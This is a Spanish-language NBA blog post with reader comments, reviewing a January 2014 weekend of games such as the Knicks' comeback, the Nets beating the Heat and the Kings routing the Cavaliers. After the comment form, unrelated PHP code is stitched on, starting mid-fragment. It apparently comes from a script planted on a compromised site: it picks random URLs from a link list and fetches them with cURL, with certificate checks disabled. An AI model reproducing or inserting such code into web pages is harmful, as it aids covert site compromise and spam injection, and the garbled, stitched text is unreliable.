Informe del fin de semana: Knicks Resurrection

13 de January de 2014 por TheDeerHunter

Días algo gélidos en nuestro blog, aunque los habituales os habéis hecho notar.

El viernes tuvimos cobertura intensiva:

“La victoria de Nets tiene mucho mérito. Si bien los de Florida pueden argumentar que faltaban Wade y Chalmers, los de Brooklyn podrían decir que no están Deron Williams ni Brook López. Parecida anda la enfermería. Empiezan a carburar y van a ser duros de pelar” Luis H.

Efectivamente, uno de los titulares que nos dejó la jornada fue la derrota tras dos prórrogas de los Heat en Brooklyn. Ya advertíamos que podía ocurrir por el cambio de imagen de los Nets. No cabe duda que es un equipo con mimbres para ello. Por otro lado no recordábamos la última vez en la que LeBron terminó expulsado por faltas.

Otro foco de interés estuvo en el palizón que les dieron los Clippers a sus vecinos “ricos”, con Blake Griffin en estado de gracia y…

“Gran partido de Redick tras 2 meses sin jugar, y excepcional Collison en estos partidos supliendo a Paul.” Denise

Del resto de jornada, comentábais la exhibición defensiva de los Pacers, dejando a Wizards en 66 puntos. También la apurada victoria de Warriors ante un equipo “menor” como Celtics… pero qué bueno es Curry. Y hablando de maravillas baloncestísticas, Jose Luis daba en el clavo destacando a Cousins, que cuando se pone a jugar tiene un nivel muy difícil de igualar. ¿Puede ser el mejor pívot del año como asegura Melo? Vosotros diréis. Los Kings, por cierto, ganaban a Orlando gracias a esta actuación.

Además, los Pistons lograron levantar cabeza remontando ante Sixers; los Hawks igual ante Rockets a pesar de un horroroso primer cuarto; los Grizzlies derrotaron bien a los Suns de la mano de Conley; los Wolves le endosaron 119 puntos a Bobcats; los Pelicans, muy castigados por las lesiones, cayeron por 4ª vez consecutiva, en esta ocasión frente los Mavs; los Bulls cumplían ante Bucks con doble-doble de Boozer, y Deng debutó en la victoria de Cavs frente a Utah. 

El sábado…

“Los knicks siguen con su particular resurrección, a ver cuanto les dura. Un dato que me llama la atención es que JR lanzó solamente 8 veces a canasta (y con buenos porcentajes, doblemente sorprendente) y repartió 6 asistencias” Schize 

Como bien comentaba Schize, los Knicks ganaban a Philadelphia y continúan así su particular remontada. Al compañero le faltó comentar el gran partido de Amare Stoudemire, que últimamente lo está haciendo muy bien desde el banco.

Otro resultado que mereció vuestra atención fue el del Raptors – Nets con victoria de los canadienses:

“Estos Toronto van en serio, esta noche cortaron la buena racha de brooklin” jhc

Atención que los Raptors ya amenazan la tercera posición de la conferencia Este… ¿Tanking? ¿Qué tanking?

También asistimos a una de esas grandes exhiciones de Dirk Nowitzki que ejecutó a Pelicans con 40 puntos aunque la victoria quedó empañada por una falta clarísima sobre la bocina que los árbitros no pitaron al final de la regular con los visitantes 3 abajo. Por su parte, Durant no perdía comba ante Bucks y los Pistons y Josh Smith seguían de dulce ante los Suns. No se puede decir lo mismo de los Celtics, que sumaron su octava derrota consecutiva en Portland. En cambio, los Bulls mantuvieron su imbatibilidad desde el traspaso de Deng ante Bobcats, que abandonan los puestos de playoffs,  los Rockets ganaron en Washington y los Nuggets destrozaron a Orlando.

Ayer solo se jugaron 3 partidos. Los Spurs maniataron a los Kevin de Minnesota y se llevaron la victoria de la mano de un magistral Kawhi Leonard. Hawks y Grizzlies se enfrentaban en un partido donde lo que más destacaba a priori eran las bajas. Al final la victoria fue para los ositos con Mike Conley confirmando que ha dado un paso adelante con la baja de Marc Gasol. Finalmente, los Kings arrasaron a los Cavs de 44 puntos de diferencia. Isaiah Thomas hizo lo que quiso con Kyrie Irving y Cousins y Gay demostraron que en estos momentos forman una de las mejores parejas de la liga.

Comenta

11 comentarios a esta entrada

  1. Simon dice:
    #1

    Estoy de acuerdo en lo de falta clarísia la acción sobre Austin Rivers pero no creo que sean 3 tiros. la falta parece anterior a que Rivers comience el gesto del tiro no?

      Citar

  2. Schize dice:
    #2

    Vaya repaso le dió Thomas (60 del draft 2011) a Irving (1 de ese mismo draft). Gran acierto en esa elección por parte de los Kings. Kyrie muy irregular, año decepcionante tanto en lo personal como por parte de todo el equipo. Los Cavs me gustan mucho pero este año están muy por dejando de las expectativas. Y no me explico que en un partido en el que no te juegas nada en toda la segunda parte no le des minutos a tu número 1 del draft. No entiendo a Brown.

      Citar

  3. Jose Luis dice:
    #3

    Bennet tiene una desidia y desgana encima…

      Citar

  4. Luis H. dice:
    #4

    Aunque sea el más perro del mundo, que no lo creo, a Bennet necesitan darle pista aunque sea para colocarle en otro equipo. Por cierto, parece -ya era hora- que los KIngs empiezan a carburar. Han encontrado tres patas en el cinco titular con Thomas, Gay y Cousins y el resto va aportando. Están lejos de playoffs pero recuperando a Landry y dando pista a un buen 2 como McLemore…

      Citar

  5. txusma dice:
    #5

    Ojito al bloqueo que se clava Anthony Bennett:

    http://s3.amazonaws.com/br-cdn/temp_images/2014/01/09/832477570.gif

    Con este espíritu ya puede irse olvidando.

      Citar

  6. Jose Luis dice:
    #6

    txusma:
    Ojito al bloqueo que se clava Anthony Bennett:

    http://s3.amazonaws.com/br-cdn/temp_images/2014/01/09/832477570.gif

    Con este espíritu ya puede irse olvidando.

    Yo lo leí en ESPN. Ya el pase es con desgana, pero el bloqueo es… pf

      Citar

  7. Mamba_Blanca dice:
    #7

    Gay 20 puntos, 8-12 en tiros de campo, 5 rebotes, 3 asistencias y 3 tapones, en mi opinion este es el rol que le va bien. En cuanto intenta ser una superestrella no le va bien

      Citar

  8. Mamba_Blanca dice:
    #8

    Perdón por mi lenguaje repetitivo, que ahora que lo leo me he expresado un poco/bastante mal. Es lo que hace escribir desde el móvil en el metro jaja

      Citar

  9. Ruxixon dice:
    #9

    El vestuario de los Cavaliers debe ser de película y Mike Brown un genio de la búsqueda de química dentro del equipo,vaya esperpento y pobre Deng,no hay cambio ni nada entre Chicago y Cleveland

      Citar

  10. arivas dice:
    #10

    JOJO, y tanto, pobre Deng primer día y te ganan de 40 los Kings….

    La verdad que los Cavs son un poco desastre. Lo de Bennett es evidente mucha culpa suya, pero tampoco le estan ayudando mucho.
    Por fin consiguen un alero (algo que no hicieron ni con Bennett ni con Waiters via draft) y viendo el panorama veremos cuanto les dura y de qué les sirve (quiza para quedarse sin un buen pick), Irving uno de los jugadores mas decepcinoantes del año… mal pinta la cosa.

      Citar

  11. rumbero dice:
    #11

    Ruxixon:
    El vestuario de los Cavaliers debe ser de película y Mike Brown un genio de la búsqueda de química dentro del equipo,vaya esperpento y pobre Deng,no hay cambio ni nada entre Chicago y Cleveland

    Y muchos se han aventurado a darles plaza de PO seguro con la llegada de Deng tal y como está el este. Yo no doy ni un duro. Siempre acabo diciendo lo mismo de los Cavs, pero es que son un desatre. Es infumable mirarse un partido suyo a día de hoy. Ayer 11 puntos en el tercer cuarto. De los últimos 15 partidos han ganado 4: Orlando, Bucks, Sixers, Jazz. La desidía de Bennet. Y nadie mueve un dedo…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>